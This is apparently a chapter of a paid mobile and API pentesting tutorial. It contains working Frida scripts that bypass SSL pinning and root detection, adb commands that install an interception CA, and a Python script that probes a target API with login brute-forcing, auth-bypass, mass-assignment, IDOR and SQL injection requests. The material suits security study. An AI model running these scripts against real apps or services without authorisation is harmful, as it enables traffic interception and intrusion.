Mobile & API Pentesting

🔥 Vibe Prompt

"Pentest a mobile app: intercept traffic, bypass SSL, root detection, API testing."

Mobile Setup

# Android: Burp Suite proxy
# 1. Set Wi-Fi proxy to Burp (192.168.1.X:8080)
# 2. Install Burp CA cert
adb push burp-ca.der /sdcard/
adb shell "su -c 'cp /sdcard/burp-ca.der /system/etc/security/cacerts/9a5ba575.0'"

# iOS: Proxy with QProxy
# 1. Install QProxy from Cydia
# 2. Set proxy to Burp
# 3. Install Burp CA (Settings → Profile)

# Bypass SSL pinning (Android)
# Use Frida: frida -U -f com.target.app -l ssl_bypass.js

Frida SSL Bypass

// ssl_bypass.js
Java.perform(function() {
    var ArrayList = Java.use('java.util.ArrayList');
    var TrustManager = Java.use('javax.net.ssl.TrustManager');
    
    var TrustAll = Java.registerClass({
        name: 'com.example.TrustAll',
        implements: [TrustManager],
        methods: {
            checkClientTrusted: function(chain, authType) {},
            checkServerTrusted: function(chain, authType) {},
            getAcceptedIssuers: function() { return []; }
        }
    });
    
    var SSLContext = Java.use('javax.net.ssl.SSLContext');
    SSLContext.init.overload('[Ljavax.net.ssl.KeyManager;', '[Ljavax.net.ssl.TrustManager;', 'java.security.SecureRandom').implementation = function(keyManagers, trustManagers, secureRandom) {
        return this.init(keyManagers, [TrustAll.$new()], secureRandom);
    };
    
    console.log("SSL pinning bypassed!");
});

# Run: frida -U -f com.target.app -l ssl_bypass.js

Root Detection Bypass

// root_bypass.js
Java.perform(function() {
    // Method 1: Hook root check
    var RootBeer = Java.use('com.scottyab.rootbeer.RootBeer');
    RootBeer.isRooted.implementation = function() { return false; };
    
    // Method 2: Hide from detection
    var Process = Java.use('java.lang.Process');
    var File = Java.use('java.io.File');
    File.exists.implementation = function() {
        var path = this.getPath();
        if (path.includes("su") || path.includes("magisk")) {
            return false;
        }
        return this.exists();
    };
    
    console.log("Root detection bypassed!");
});

API Security Testing

import requests

BASE = "https://api.target.com/v1"

def test_api():
    findings = []
    
    # 1. Rate limiting
    for i in range(100):
        r = requests.post(f"{BASE}/login", json={"user": "admin", "pass": "wrong"})
        if r.status_code != 429 and i > 10:
            findings.append("No rate limiting on login!")
            break
    
    # 2. Auth bypass
    r = requests.get(f"{BASE}/admin/users", headers={"Authorization": "Bearer invalid"})
    if r.status_code == 200:
        findings.append("Auth bypass!")
    
    # 3. Mass assignment
    r = requests.put(f"{BASE}/user/profile", json={"name": "test", "role": "admin"})
    if r.status_code == 200:
        findings.append("Mass assignment: role updated!")
    
    # 4. IDOR
    r1 = requests.get(f"{BASE}/orders/1", headers={"Authorization": f"Bearer {token}"})
    r2 = requests.get(f"{BASE}/orders/2", headers={"Authorization": f"Bearer {token}"})
    if r1.json().get("user_id") != r2.json().get("user_id") and r2.status_code == 200:
        findings.append("IDOR: can access other orders!")
    
    # 5. Injection
    r = requests.get(f"{BASE}/search?q=' OR 1=1--")
    if r.status_code == 200 and len(r.json()) > 0:
        findings.append("SQL injection in search!")
    
    return findings

for f in test_api():
    print(f"⚠️  {f}")

Mobile Pentesting Checklist

| Check | Android | iOS | |-------|---------|-----| | Traffic interception | Burp proxy + CA cert | QProxy + CA cert | | SSL pinning bypass | Frida | Frida / SSL Kill Switch 2 | | Root/jailbreak detect | RootBeer hook | AntiSubstrateCrack | | Insecure storage | SharedPrefs, SQLite | Keychain, Plist | | Hardcoded secrets | APK decompile | IPA decompile | | App clipping | Intent sniffing | URL scheme hijack | | Emulator detection | Build fingerprint | Model check |

Tools

| Tool | Purpose | |------|---------| | Frida | Runtime manipulation | | Objection | Mobile exploration | | APKTool | APK decompile | | MobSF | Static/dynamic analysis | | Drozer | Android security audit | | Radare2 | Binary analysis | | Hopper | iOS disassembler |

Best Practices

  • Always test on real device (emulator detection common)
  • Use Frida for runtime bypasses
  • Decompile APK/IPA for hardcoded secrets
  • Test both API and mobile app together
  • Check for insecure data storage
  • Verify rate limiting on all endpoints
  • Test app clipping / intent hijacking


行動裝置安全:被忽略的攻擊面

很多開發者只注重 Web 安全,卻忽略了行動裝置 App 是更大的攻擊面——App 安裝在使用者的手機上,攻擊者可以反編譯、攔截流量、分析本地儲存。

行動裝置滲透測試的重點

| 測試項目 | 檢查什麼 | 常見漏洞 | |:--------|:--------|:--------| | 本地儲存 | SharedPreferences、SQLite | 明文化保存 API Key 或 Token | | SSL Pinning | HTTPS 憑證綁定 | 沒有 Pinning 可被中間人攻擊 | | 反編譯 | ProGuard/DexGuard 混淆 | 未混淆可輕易讀取商業邏輯 | | Deep Link | URL Scheme 處理 | 可以被其他 App 惡意觸發 | | WebView | JavaScript Bridge | XSS 導致本地命令執行 |

API 滲透測試的重點

| 測試項目 | 常見漏洞 | |:--------|:--------| | 身份驗證繞過 | JWT 未驗證簽章、Token 可重放 | | Rate Limit | 沒有頻率限制,可暴力破解 | | GraphQL Injection | 深度查詢導致 DoS | | IDOR | 修改 ID 就能存取別人的資料 |

下一章預告:滲透測試報告

這是最後一章實戰。你學會了如何發現漏洞,接下來要學的是如何撰寫專業的滲透測試報告——把技術發現轉換成客戶和開發團隊能理解的語言。

解鎖完整教學內容

本章為付費內容。加入專案即可解鎖超過 5000 字的深度解析,包含 10 個以上神級 Prompt 與真實 Source Code 範例!